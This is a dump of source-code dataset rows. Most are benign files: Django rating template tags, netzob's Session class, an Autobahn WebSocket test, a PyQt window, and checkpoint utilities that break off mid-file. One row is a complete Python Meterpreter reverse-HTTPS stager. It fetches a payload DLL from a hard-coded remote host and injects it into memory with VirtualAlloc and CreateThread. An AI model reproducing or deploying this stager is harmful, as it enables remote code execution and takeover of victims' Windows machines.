| repo_name (stringlengths 6-61) | path (stringlengths 4-230) | copies (stringlengths 1-3) | size (stringlengths 4-6) | text (stringlengths 1.01k-850k) | license (stringclasses, 15 values) | hash (int64, -9,220,477,234,079,998,000 to 9,219,060,020B) | line_mean (float64, 11.6-96.6) | line_max (int64, 32-939) | alpha_frac (float64, 0.26-0.9) | autogenerated (bool, 1 class) | ratio (float64, 1.62-6.1) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ella/django-ratings | django_ratings/templatetags/ratings.py | 1 | 12532 | from decimal import Decimal
from django import template
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
from django_ratings.models import TotalRate
from django_ratings.forms import RateForm
from django_ratings.views import get_was_rated
from django.utils.translation import ugettext as _
from recepty import settings
register = template.Library()
DOUBLE_RENDER = getattr(settings, 'DOUBLE_RENDER', False)
#class RateUrlsNode(template.Node):
# def __init__(self, object, up_name, down_name, form_name=None):
# self.object, self.up_name, self.down_name = object, up_name, down_name
# self.form_name = form_name
#
# def render(self, context):
# obj = template.Variable(self.object).resolve(context)
# if obj and hasattr(obj, 'get_absolute_url'):
# context[self.up_name] = '%s%s/%s/' % (obj.get_absolute_url(), _('rate'), _('up'))
# context[self.down_name] = '%s%s/%s/' % (obj.get_absolute_url(), _('rate'), _('down'))
# elif obj:
# ct = ContentType.objects.get_for_model(obj)
# context[self.form_name] = RateForm(initial={'content_type' : ct.id, 'target' : obj._get_pk_val()})
# context[self.up_name] = reverse('rate_up')
# context[self.down_name] = reverse('rate_down')
# return ''
class RateUrlNode(template.Node):
def __init__(self, object, url_var_name, form_name=None):
self.object = object
self.url_var_name =url_var_name
self.form_name = form_name
def render(self, context):
obj = template.Variable(self.object).resolve(context)
if obj and hasattr(obj, 'get_absolute_url'):
context[self.url_var_name] = '%s%s/' % (obj.get_absolute_url(), slugify(_('rate')))
elif obj:
ct = ContentType.objects.get_for_model(obj)
context[self.form_name] = RateForm(initial={'content_type' : ct.id, 'target' : obj._get_pk_val()})
context[self.url_var_name] = reverse('rate')
return ''
#@register.tag('rate_urls')
#def do_rate_urls(parser, token):
# """
# Generate absolute urls for rating the given model up or down and store them in context.
#
# Usage::
#
# {% rate_urls for OBJ as var_up var_down %}
#
# {% rate_urls for OBJ as my_form var_up var_down %}
#
# Examples::
#
# {% rate_urls for object as url_up url_down %}
# <form action="{{url_up}}" method="POST"><input type="submit" value="+"></form>
# <form action="{{url_down}}" method="POST"><input type="submit" value="-"></form>
#
# {% rate_urls for object as rate_form url_up url_down %}
# <form action="{{url_up}}" method="POST">{{rate_form}}<input type="submit" value="+"></form>
# <form action="{{url_down}}" method="POST">{{rate_form}}<input type="submit" value="-"></form>
# """
# bits = token.split_contents()
# if (len(bits) != 6 and len(bits) != 7) or bits[1] != 'for' or bits[3] != 'as':
# raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
# if len(bits) == 6:
# return RateUrlsNode(bits[2], bits[4], bits[5])
# else:
# return RateUrlsNode(bits[2], bits[5], bits[6], bits[4])
@register.tag
def rate_url(parser, token):
"""
Fills template variable specified in argument ``tpl_var`` with URL for sending rating value.
Usage::
{% rate_url for object as tpl_var %}
Example::
{% rate_url for object as r_url %}
<form action="{{r_url}}" method="POST">
<input type="text" name="rating" value="0"/>
<input type="submit" value="Rate it"/>
</form>
"""
bits = token.split_contents()
if len(bits) != 5:
        raise template.TemplateSyntaxError('rate_url template tag should be used like this: {% rate_url for object as tpl_var %}')
return RateUrlNode(bits[2], bits[4])
class RatingNode(template.Node):
def __init__(self, object, name, max=None, step=None, min2=None):
self.object, self.name = object, name
self.min, self.max, self.step, self.min2 = min, max, step, min2
def render(self, context):
obj = template.Variable(self.object).resolve(context)
if obj:
value = 0
if (self.min != None and self.max!=None and self.min2 != None):
self.step = Decimal(self.step)
self.min2 = Decimal(self.min2)
self.max = Decimal(self.max)
possible_values = int((self.max - self.min2)/self.step+1)
value = TotalRate.objects.get_normalized_rating(obj, 1, Decimal("1.0")/(possible_values/2))
value = value*(self.max - self.min2)/2 + (self.max+self.min2)/2
# Due to the nature of the 'get_normalized_rating' function, an odd number
# of possible return values is required. If the input parameters yield
# an even number of possible return values, an approximation is necessary.
#
# In the following cycle, the value closest to the obtained result still
# fulfilling the input 'min', 'max' and 'step' parameters is being looked for.
if possible_values%2 == 0:
old_value = self.min2
best_approximation = self.min2
while (1):
cur_value = old_value + self.step
if cur_value > self.max:
break
old_error = abs(old_value - value)
cur_error = abs(cur_value - value)
if cur_error <= old_error:
best_approximation = cur_value
elif cur_error >= best_approximation:
break
old_value = cur_value
value = best_approximation
elif (self.min is not None and self.max is not None):
value = TotalRate.objects.get_normalized_rating(obj, Decimal(self.max), Decimal(self.step))
else:
value = TotalRate.objects.get_total_rating(obj)
# Set as string to be able to compare value in template
context[self.name] = str(value)
return ''
@register.tag('rating')
def do_rating(parser, token):
"""
Get rating for the given object and store it in context under given name.
Usage::
Select total rating:
{% rating for OBJ as VAR %}
Normalize rating to <-X, X> with step Y and round to Z:
{% rating for OBJ max X step Y as VAR %}
Normalize rating to <X, Y> with step S:
{% rating for OBJ min X max Y step S as VAR %}
Notice:
In order to obtain correct results, (Y-X)/S must be in Z (integers).
Also, (Y-X)/S+1 (number of possible values the function can return)
should preferably be an odd number, as it better corresponds to
the way the 'get_normalized_rating' function works.
Examples::
{% rating for object as object_rating %}
object {{object}} has rating of {{object_rating}}
{% rating for object max 1 step 0.5 as object_rating %}
object {{object}} has rating of {{object_rating}} from (-1, -0.5, 0, 0.5, 1)
"""
bits = token.split_contents()
if len(bits) == 5 and bits[1] == 'for' and bits[3] == 'as':
return RatingNode(bits[2], bits[4])
if len(bits) == 9 and bits[1] == 'for' and bits[3] == 'max' \
and bits[5] == 'step' and bits[7] == 'as':
return RatingNode(bits[2], bits[8], bits[4], bits[6])
if len(bits) == 11 and bits[1] == 'for' and bits[3] == 'min' \
and bits[5] == 'max' and bits[7] == 'step' and bits[9] == 'as':
return RatingNode(bits[2], bits[10], bits[6], bits[8], bits[4])
raise template.TemplateSyntaxError, \
"{% rating for OBJ as VAR %} or {% rating for OBJ max X step Y as VAR %}"
class WasRatedNode(template.Node):
def __init__(self, object, name):
self.object, self.name = object, name
def render(self, context):
object = template.Variable(self.object).resolve(context)
ct = ContentType.objects.get_for_model(object)
context[self.name] = get_was_rated(context['request'], ct, object)
return ''
@register.tag('was_rated')
def do_was_rated(parser, token):
"""
{% was_rated for OBJ as VAR %}
"""
bits = token.split_contents()
if len(bits) == 5 and bits[1] == 'for' and bits[3] == 'as':
return WasRatedNode(bits[2], bits[4])
raise template.TemplateSyntaxError, "{% was_rated for OBJ as VAR %}"
class TopRatedNode(template.Node):
def __init__(self, count, name, mods=None):
self.count, self.name, self.mods = count, name, mods
def render(self, context):
context[self.name] = TotalRate.objects.get_top_objects(self.count, self.mods)
return ''
@register.tag('top_rated')
def do_top_rated(parser, token):
"""
Get list of COUNT top rated objects of given model and store them in context under given name.
Usage::
{% top_rated 5 [app.model ...] as var %}
Example::
{% top_rated 10 as top_rated_objects %}
{% for obj in top_rated_objects %} ... {% endfor %}
{% top_rated 10 articles.article as top_articles %}
{% for article in top_articles %} ... {% endfor %}
{% top_rated 10 articles.article photos.photo as top_objects %}
{% for obj in top_objects %} ... {% endfor %}
"""
bits = token.split_contents()
if len(bits) < 3 or bits[-2] != 'as':
raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
count = int(bits[1])
mods = []
for mod in bits[2:-2]:
model = models.get_model(*mod.split('.', 1))
if not model:
raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
mods.append(model)
return TopRatedNode(count, bits[-1], mods)
class IfWasRatedNode(template.Node):
def __init__(self, nodelist_true, nodelist_false, obj=None, ct=None, pk=None):
self.nodelist_true = nodelist_true
self.nodelist_false = nodelist_false
self.obj= None
if obj:
self.obj = template.Variable(obj)
self.ct = ct
self.pk = pk
def render(self, context):
if self.obj:
obj = self.obj.resolve(context)
ct = ContentType.objects.get_for_model(obj).id
pk = obj.pk
else:
ct = self.ct
pk = self.pk
if DOUBLE_RENDER and 'SECOND_RENDER' not in context:
return u"{%% load ratings %%}" \
u"{%% if_was_rated %(ct)s:%(pk)s %%}" \
u"%(nodelist_true)s{%% else %%}%(nodelist_false)s{%% endif_was_rated %%}" % ({
'ct' : ct,
'pk' : pk,
'nodelist_true' : self.nodelist_true.render(context),
'nodelist_false' : self.nodelist_false.render(context),
})
if get_was_rated(context['request'], ct, pk):
return self.nodelist_true.render(context)
else:
return self.nodelist_false.render(context)
@register.tag('if_was_rated')
def do_if_was_rated(parser, token):
"""
{% if_was_rated object %}...{% else %}...{% endif_was_rated %}
"""
bits = token.contents.split()
if len(bits) == 2:
kwargs = {}
# Opening tag
obj = bits[1]
if ":" in obj:
ct,pk = obj.split(":")
kwargs.update({"ct":int(ct), "pk":int(pk)})
else:
kwargs.update({"obj":obj})
# Nodelist true
nodelist_true = parser.parse(('else', 'endif_was_rated'))
token = parser.next_token()
kwargs.update({"nodelist_true":nodelist_true})
# Nodelist false
if token.contents == 'else':
nodelist_false = parser.parse(('endif_was_rated',))
kwargs.update({"nodelist_false":nodelist_false})
parser.delete_first_token()
else:
nodelist_false = template.NodeList()
return IfWasRatedNode(**kwargs)
raise template.TemplateSyntaxError, "{%% %s object %%}" % bits[0]
| bsd-3-clause | -4,608,076,433,966,314,500 | 37.091185 | 130 | 0.56647 | false | 3.661116 | false | false | false |
dasbruns/netzob | src/netzob/Common/Models/Vocabulary/Session.py | 1 | 13260 | # -*- coding: utf-8 -*-
#+---------------------------------------------------------------------------+
#| 01001110 01100101 01110100 01111010 01101111 01100010 |
#| |
#| Netzob : Inferring communication protocols |
#+---------------------------------------------------------------------------+
#| Copyright (C) 2011-2014 Georges Bossert and Frédéric Guihéry |
#| This program is free software: you can redistribute it and/or modify |
#| it under the terms of the GNU General Public License as published by |
#| the Free Software Foundation, either version 3 of the License, or |
#| (at your option) any later version. |
#| |
#| This program is distributed in the hope that it will be useful, |
#| but WITHOUT ANY WARRANTY; without even the implied warranty of |
#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
#| GNU General Public License for more details. |
#| |
#| You should have received a copy of the GNU General Public License |
#| along with this program. If not, see <http://www.gnu.org/licenses/>. |
#+---------------------------------------------------------------------------+
#| @url : http://www.netzob.org |
#| @contact : [email protected] |
#| @sponsors : Amossys, http://www.amossys.fr |
#| Supélec, http://www.rennes.supelec.fr/ren/rd/cidre/ |
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Standard library imports
#+---------------------------------------------------------------------------+
import uuid
#+---------------------------------------------------------------------------+
#| Related third party imports
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Local application imports
#+---------------------------------------------------------------------------+
from netzob.Common.Utils.Decorators import typeCheck, NetzobLogger
from netzob.Common.Models.Vocabulary.Messages.AbstractMessage import AbstractMessage
from netzob.Common.Utils.SortedTypedList import SortedTypedList
from netzob.Common.Utils.TypedList import TypedList
from netzob.Common.Models.Vocabulary.ApplicativeData import ApplicativeData
from netzob.Common.Models.Vocabulary.AbstractField import AbstractField
@NetzobLogger
class Session(object):
"""A session includes messages exchanged in the same session. Messages
    are automatically sorted.
Applicative data can be attached to sessions.
>>> import time
>>> from netzob.all import *
>>> # we create 3 messages
>>> msg1 = RawMessage("ACK", source="A", destination="B", date=time.mktime(time.strptime("9 Aug 13 10:45:05", "%d %b %y %H:%M:%S")))
>>> msg2 = RawMessage("SYN", source="A", destination="B", date=time.mktime(time.strptime("9 Aug 13 10:45:01", "%d %b %y %H:%M:%S")))
>>> msg3 = RawMessage("SYN/ACK", source="B", destination="A", date=time.mktime(time.strptime("9 Aug 13 10:45:03", "%d %b %y %H:%M:%S")))
>>> session = Session([msg1, msg2, msg3])
>>> print session.messages.values()[0]
[0;32m[1376037901.0 [0;m[1;32mA[1;m[0;32m->[0;m[1;32mB[1;m[0;32m][0;m 'SYN'
>>> print session.messages.values()[1]
[0;32m[1376037903.0 [0;m[1;32mB[1;m[0;32m->[0;m[1;32mA[1;m[0;32m][0;m 'SYN/ACK'
>>> print session.messages.values()[2]
[0;32m[1376037905.0 [0;m[1;32mA[1;m[0;32m->[0;m[1;32mB[1;m[0;32m][0;m 'ACK'
"""
def __init__(self, messages=None, _id=None, applicativeData=None, name="Session"):
"""
:parameter messages: the messages exchanged in the current session
:type data: a list of :class:`netzob.Common.Models.Vocabulary.Messages.AbstractMessage.AbstractMessage`
:parameter _id: the unique identifier of the session
:type _id: :class:`uuid.UUID`
        :keyword applicativeData: a list of :class:`netzob.Common.Models.Vocabulary.ApplicativeData.ApplicativeData`
"""
self.__messages = SortedTypedList(AbstractMessage)
self.__applicativeData = TypedList(ApplicativeData)
if messages is None:
messages = []
self.messages = messages
if _id is None:
_id = uuid.uuid4()
self.id = _id
if applicativeData is None:
applicativeData = []
self.applicativeData = applicativeData
self.name = name
@property
def id(self):
"""The unique identifier of the session.
:type: :class:`uuid.UUID`
"""
return self.__id
@id.setter
@typeCheck(uuid.UUID)
def id(self, _id):
if _id is None:
raise TypeError("Id cannot be None")
self.__id = _id
@property
def messages(self):
"""The messages exchanged in the current session.
Messages are sorted.
:type: a :class:`netzob.Common.Utils.TypedList.TypedList` of :class:`netzob.Common.Models.Vocabulary.Messages.AbstractMessage.AbstractMessage`
"""
return self.__messages
def clearMessages(self):
"""Delete all the messages attached to the current session"""
for msg in self.__messages.values():
msg.session = None
self.__messages.clear()
@messages.setter
def messages(self, messages):
if messages is None:
messages = []
# First it checks the specified messages are all AbstractMessages
for msg in messages:
if not isinstance(msg, AbstractMessage):
raise TypeError("Cannot add messages of type {0} in the session, only AbstractMessages are allowed.".format(type(msg)))
self.clearMessages()
for message in messages:
self.__messages.add(message)
message.session = self
@property
def applicativeData(self):
"""Applicative data attached to the current session.
>>> from netzob.all import *
>>> appData = ApplicativeData("test", Decimal(20))
>>> session = Session(applicativeData=[appData])
>>> print len(session.applicativeData)
1
>>> appData2 = ApplicativeData("test2", ASCII("helloworld"))
>>> session.applicativeData.append(appData2)
>>> print len(session.applicativeData)
2
>>> print session.applicativeData[0]
Applicative Data: test=Decimal=20 ((8, 8)))
>>> print session.applicativeData[1]
Applicative Data: test2=ASCII=helloworld ((0, 80)))
:type: a list of :class:`netzob.Common.Models.Vocabulary.ApplicativeData.ApplicativeData`.
"""
return self.__applicativeData
def clearApplicativeData(self):
while(len(self.__applicativeData) > 0):
self.__applicativeData.pop()
@applicativeData.setter
def applicativeData(self, applicativeData):
for app in applicativeData:
if not isinstance(app, ApplicativeData):
raise TypeError("Cannot add an applicative data with type {0}, only ApplicativeData accepted.".format(type(app)))
self.clearApplicativeData()
for app in applicativeData:
self.applicativeData.append(app)
@property
def name(self):
return self.__name
@name.setter
@typeCheck(str)
def name(self, _name):
if _name is None:
raise TypeError("Name cannot be None")
self.__name = _name
def getEndpointsList(self):
"""Retrieve all the endpoints couples that are present in the
session.
>>> from netzob.all import *
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="C")
>>> session = Session([msg1, msg2, msg3])
>>> print len(session.getEndpointsList())
2
>>> print session.getEndpointsList()
[('A', 'B'), ('A', 'C')]
:return: a list containing couple of endpoints (src, dst).
:rtype: a :class:`list`
"""
endpointsList = []
for message in self.messages.values():
src = message.source
dst = message.destination
endpoints1 = (src, dst)
endpoints2 = (dst, src)
if (not endpoints1 in endpointsList) and (not endpoints2 in endpointsList):
endpointsList.append(endpoints1)
return endpointsList
def getTrueSessions(self):
"""Retrieve the true sessions embedded in the current
session. A session is here characterized by a uniq endpoints
couple.
TODO: a more precise solution would be to use flow
reconstruction (as in TCP).
>>> from netzob.all import *
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="C")
>>> session = Session([msg1, msg2, msg3])
>>> print len(session.getTrueSessions())
2
>>> for trueSession in session.getTrueSessions():
... print trueSession.name
Session: 'A' - 'B'
Session: 'A' - 'C'
:return: a list containing true sessions embedded in the current session.
:rtype: a :class:`list`
"""
trueSessions = []
for endpoints in self.getEndpointsList():
trueSessionMessages = []
src = None
dst = None
for message in self.messages.values():
if message.source in endpoints and message.destination in endpoints:
trueSessionMessages.append(message)
if src is None:
src = message.source
if dst is None:
dst = message.destination
trueSession = Session(messages=trueSessionMessages, applicativeData=self.applicativeData, name="Session: '" + str(src) + "' - '" + str(dst) + "'")
trueSessions.append(trueSession)
return trueSessions
def isTrueSession(self):
"""Tell if the current session is true. A session is said to
be true if the communication flow pertain to a uniq
applicative session between a couple of endpoints.
>>> from netzob.all import *
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="B")
>>> session = Session([msg1, msg2, msg3])
>>> print session.isTrueSession()
True
:return: a boolean telling if the current session is a true one (i.e. it corresponds to a uniq applicative session between two endpoints).
:rtype: a :class:`bool`
"""
if len(self.getTrueSessions()) == 1:
return True
else:
return False
@typeCheck(list)
def abstract(self, symbolList):
"""This method abstract each message of the current session
into symbols according to a list of symbols given as
parameter.
>>> from netzob.all import *
>>> symbolSYN = Symbol([Field(ASCII("SYN"))], name="Symbol_SYN")
>>> symbolSYNACK = Symbol([Field(ASCII("SYN/ACK"))], name="Symbol_SYNACK")
>>> symbolACK = Symbol([Field(ASCII("ACK"))], name="Symbol_ACK")
>>> symbolList = [symbolSYN, symbolSYNACK, symbolACK]
>>> msg1 = RawMessage("SYN", source="A", destination="B")
>>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
>>> msg3 = RawMessage("ACK", source="A", destination="B")
>>> session = Session([msg1, msg2, msg3])
>>> if session.isTrueSession():
... for src, dst, sym in session.abstract(symbolList):
... print str(src) + " - " + str(dst) + " : " + str(sym.name)
A - B : Symbol_SYN
B - A : Symbol_SYNACK
A - B : Symbol_ACK
:return: a list of tuples containing the following elements : (source, destination, symbol).
:rtype: a :class:`list`
"""
abstractSession = []
if not self.isTrueSession():
self._logger.warn("The current session cannot be abstracted as it not a true session (i.e. it may contain inner true sessions).")
return abstractSession
for message in self.messages.values():
symbol = AbstractField.abstract(message.data, symbolList)
abstractSession.append((message.source, message.destination, symbol))
return abstractSession
| gpl-3.0 | 9,043,246,579,454,872,000 | 41.216561 | 158 | 0.551675 | false | 4.125739 | false | false | false |
Brother-Simon/AutobahnTestSuite | autobahntestsuite/autobahntestsuite/case/case9_2_1.py | 14 | 2183 | ###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from case import Case
class Case9_2_1(Case):
DESCRIPTION = """Send binary message message with payload of length 64 * 2**10 (64k)."""
EXPECTATION = """Receive echo'ed binary message (with payload as sent)."""
def init(self):
self.DATALEN = 64 * 2**10
self.PAYLOAD = "\x00\xfe\x23\xfa\xf0"
self.WAITSECS = 10
self.reportTime = True
def onOpen(self):
self.p.createWirelog = False
self.behavior = Case.FAILED
self.expectedClose = {"closedByMe":True,"closeCode":[self.p.CLOSE_STATUS_CODE_NORMAL],"requireClean":True}
self.result = "Did not receive message within %d seconds." % self.WAITSECS
self.p.sendFrame(opcode = 2, payload = self.PAYLOAD, payload_len = self.DATALEN)
self.p.closeAfter(self.WAITSECS)
def onMessage(self, msg, binary):
if not binary:
self.result = "Expected binary message with payload, but got text."
else:
if len(msg) != self.DATALEN:
self.result = "Expected binary message with payload of length %d, but got %d." % (self.DATALEN, len(msg))
else:
## FIXME : check actual content
##
self.behavior = Case.OK
self.result = "Received binary message of length %d." % len(msg)
self.p.createWirelog = True
self.p.sendClose(self.p.CLOSE_STATUS_CODE_NORMAL)
| apache-2.0 | -4,340,786,548,976,465,000 | 37.690909 | 117 | 0.594137 | false | 3.926259 | false | false | false |
syphersec/injectors | python/meterpreter_reverse_https.py | 1 | 2893 | #
# Python windows/meterpreter/reverse_https stager
# (doesn't rely on shellcode)
#
# By: @harmj0y
#
import httplib, string, random, struct, ctypes, time
# helper for the metasploit http checksum algorithm
def checksum8(s):
# hard rubyish way -> return sum([struct.unpack('<B', ch)[0] for ch in s]) % 0x100
return sum([ord(ch) for ch in s]) % 0x100
# generate a metasploit http handler compatible checksum for the URL
def genHTTPChecksum():
chk = string.ascii_letters + string.digits
for x in xrange(64):
uri = "".join(random.sample(chk,3))
r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
for char in r:
if checksum8(uri + char) == 92:
return uri + char
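# Editor's note (illustrative, not from the original stager): the handler only
# answers URIs whose 8-bit checksum equals 92, so genHTTPChecksum() keeps sampling
# random 3-character URIs plus one extra character until the byte sum mod 256 hits
# that target. A quick hand-check against the checksum8() defined above:
#
#   checksum8("zz80")  # 122 + 122 + 56 + 48 = 348, and 348 % 256 == 92
#
# Any such 4-character URI should be accepted by the matching handler.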
def connect():
# establish a HTTPS connection to the metasploit handler
c = httplib.HTTPSConnection("192.168.30.129", 443)
# get our checksumed resource
c.request("GET", "/" + genHTTPChecksum() )
response = c.getresponse()
# only return data if it was http code 200
if response.status == 200: return response.read()
else: return ""
# injects the meterpreter .dll into memory
def inject(dll):
# make sure we have something to inject
if dll != "":
# read in the meterpreter .dll and convert it to a byte array
shellcode = bytearray(dll)
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
# read in the buffer
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
html = connect()
inject(html) | gpl-3.0 | -7,692,136,107,398,896,000 | 39.760563 | 104 | 0.546146 | false | 4.204942 | false | false | false |
autonimo/autonimo | autonimo/views/main_view.py | 1 | 5341 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from gen.ui_main_view import Ui_MainView
from views.component_view import ComponentView
from views.task_view import TaskView
# from views.component_main_window import ComponentMainWindow
# from views.routine_widget import RoutineWidget
from models import model
class MainView(QtGui.QMainWindow):
def __init__(self, model, comp_ctrl, task_ctrl):
super(MainView, self).__init__(None)
self.model = model
self.comp_ctrl = comp_ctrl
self.task_ctrl = task_ctrl
self.build_ui()
def build_ui(self):
self.ui = Ui_MainView()
self.ui.setupUi(self)
# self.build_subwindows()
# self.ui.action_routine_editor.triggered.connect(self.on_window_routine_editor)
self.build_menu_bar()
self.build_comps_dockwidget()
self.build_tasks_dockwidget()
self.ui.action_open_task.triggered.connect(self.on_open_task)
def build_menu_bar(self):
self.ui.action_about.triggered.connect(self.show_about)
def show_about(self):
QtGui.QMessageBox.information(self, model.APP_NAME, '{} v{}\n\n{}'.format(model.APP_NAME,
model.APP_VERSION,
model.APP_URL))
def on_open_task(self):
print self.model.app.activeWindow()
print self.ui.mdiArea.activeSubWindow()
print self.ui.mdiArea.focusWidget()
print ''
def build_comps_dockwidget(self):
self.ui.treeView_comps_available.setModel(self.model.comps_available_model)
self.ui.treeView_comps_available.setHeaderHidden(True)
self.ui.treeView_comps_available.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.ui.treeView_comps_available.expandAll()
self.ui.treeView_comps_available.doubleClicked.connect(self.test2)
def build_tasks_dockwidget(self):
self.ui.treeView_tasks_available.setModel(self.model.tasks_available_model)
self.ui.treeView_tasks_available.setHeaderHidden(True)
self.ui.treeView_tasks_available.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.ui.treeView_tasks_available.expandAll()
self.ui.treeView_tasks_available.doubleClicked.connect(self.test)
def test2(self, index):
# make a new task subwindow
comp = self.comp_ctrl.create_comp(index)
if comp is not None:
self.new_comp_subwindow(comp)
def test(self, index):
# make a new task subwindow
task = self.task_ctrl.create_task(index)
if task is not None:
self.new_task_subwindow(task)
def new_comp_subwindow(self, comp, params=None):
self.comp_view = ComponentView(self, comp)
self.ui.mdiArea.addSubWindow(self.comp_view)
self.comp_view.show()
def new_task_subwindow(self, task, params=None):
self.task_view = TaskView(self, task)
self.ui.mdiArea.addSubWindow(self.task_view)
self.task_view.show()
# self.task_widget = TaskWidget(self, task)
#
# # sub_window = QtGui.QMdiSubWindow()
# # sub_window.setWidget(task_widget)
#
# # w = QtGui.QWidget(self)
# #
# # w.add
# #
# # # w.move(300, 300)
# # w.setWindowTitle('Simple')
# # w.show()
#
#
# _ = self.ui.mdiArea.addSubWindow(self.task_widget)
#
# print 'ere'
# FormWidget.show()
# class FormWidget(QtGui.QWidget):
# def __init__(self, parent):
# super(FormWidget, self).__init__(parent)
# self.layout = QtGui.QVBoxLayout(self)
#
# self.button1 = QtGui.QPushButton("Button 1")
# self.layout.addWidget(self.button1)
#
# self.button2 = QtGui.QPushButton("Button 2")
# self.layout.addWidget(self.button2)
#
# self.setLayout(self.layout)
#
#
def build_subwindows(self):
# pass
# samples
# self.ui.mdiArea.closeAllSubWindows()
self.task_widget = TaskWidget(self, None)
_ = self.ui.mdiArea.addSubWindow(self.task_widget)
# self.task_widget.activateWindow()
self.task_widget.show()
#
# self.task_widget2 = TaskWidget(self)
# self.task_widget2.setWindowTitle('hello!')
# _ = self.ui.mdiArea.addSubWindow(self.task_widget2)
#
# # try putting a main window in a sub window
# self.component_main_window = ComponentMainWindow(self)
# _ = self.ui.mdiArea.addSubWindow(self.component_main_window)
# # self.component_main_window.show()
#
# self.routine_widget = RoutineWidget(self)
# _ = self.ui.mdiArea.addSubWindow(self.routine_widget)
# self.routine_editor = RoutineEditor(self)
# flags = self.routine_editor.windowFlags()
# # self.routine_editor.setWindowFlags(flags | QtCore.Qt.WindowStaysOnTopHint)
# # self.routine_editor.setWindowModality(QtCore.Qt)
#
# def on_window_routine_editor(self, checked):
# if checked:
# self.routine_editor.show()
# else:
# self.routine_editor.hide()
| gpl-3.0 | 4,671,854,105,564,582,000 | 27.715054 | 100 | 0.611496 | false | 3.523087 | false | false | false |
nearai/program_synthesis | program_synthesis/common/tools/saver.py | 1 | 5673 | """Tools to save/restore model from checkpoints."""
import argparse
import sys
import os
import torch
import re
import json
CHECKPOINT_PATTERN = re.compile('^checkpoint-(\d+)$')
class ArgsDict(dict):
def __init__(self, **kwargs):
super(ArgsDict, self).__init__()
for key, value in kwargs.items():
self[key] = value
self.__dict__ = self
def load_checkpoint(model, optimizer, model_dir, map_to_cpu=False, step=None):
path = os.path.join(model_dir, 'checkpoint')
if step is not None:
path += '-{:08d}'.format(step)
if os.path.exists(path):
print("Loading model from %s" % path)
if map_to_cpu:
checkpoint = torch.load(
path, map_location=lambda storage, location: storage)
else:
checkpoint = torch.load(path)
old_state_dict = model.state_dict()
for key in old_state_dict.keys():
if key not in checkpoint['model']:
checkpoint['model'][key] = old_state_dict[key]
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
return checkpoint.get('step', 0)
return 0
def load_and_map_checkpoint(model, model_dir, remap):
path = os.path.join(model_dir, 'checkpoint')
print("Loading parameters %s from %s" % (remap.keys(), model_dir))
checkpoint = torch.load(path)
new_state_dict = model.state_dict()
for name, value in remap.items():
# TODO: smarter mapping.
new_state_dict[name] = checkpoint['model'][value]
model.load_state_dict(new_state_dict)
def save_checkpoint(model, optimizer, step, model_dir, ignore=[],
keep_every_n=10000000):
if not os.path.exists(model_dir):
os.makedirs(model_dir)
path = os.path.join(model_dir, 'checkpoint')
step_padded = format(step, '08d')
state_dict = model.state_dict()
if ignore:
for key in state_dict.keys():
for item in ignore:
if key.startswith(item):
state_dict.pop(key)
torch.save({
'model': state_dict,
'optimizer': optimizer.state_dict(),
'step': step
}, '{}-{}'.format(path, step_padded))
if os.path.exists(path):
os.unlink(path)
source = 'checkpoint-' + step_padded
os.symlink(source, path)
# Cull old checkpoints.
if keep_every_n is not None:
all_checkpoints = []
for name in os.listdir(model_dir):
m = CHECKPOINT_PATTERN.match(name)
if m is None or name == source:
continue
checkpoint_step = int(m.group(1))
all_checkpoints.append((checkpoint_step, name))
all_checkpoints.sort()
last_step = float('-inf')
for checkpoint_step, name in all_checkpoints:
if checkpoint_step - last_step >= keep_every_n:
last_step = checkpoint_step
continue
os.unlink(os.path.join(model_dir, name))
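# Editor's note (illustrative, not from the original module): with a hypothetical run
# that calls save_checkpoint() every 10,000 steps and keep_every_n=10000, the model
# directory would end up looking like:
#
#   model_dir/
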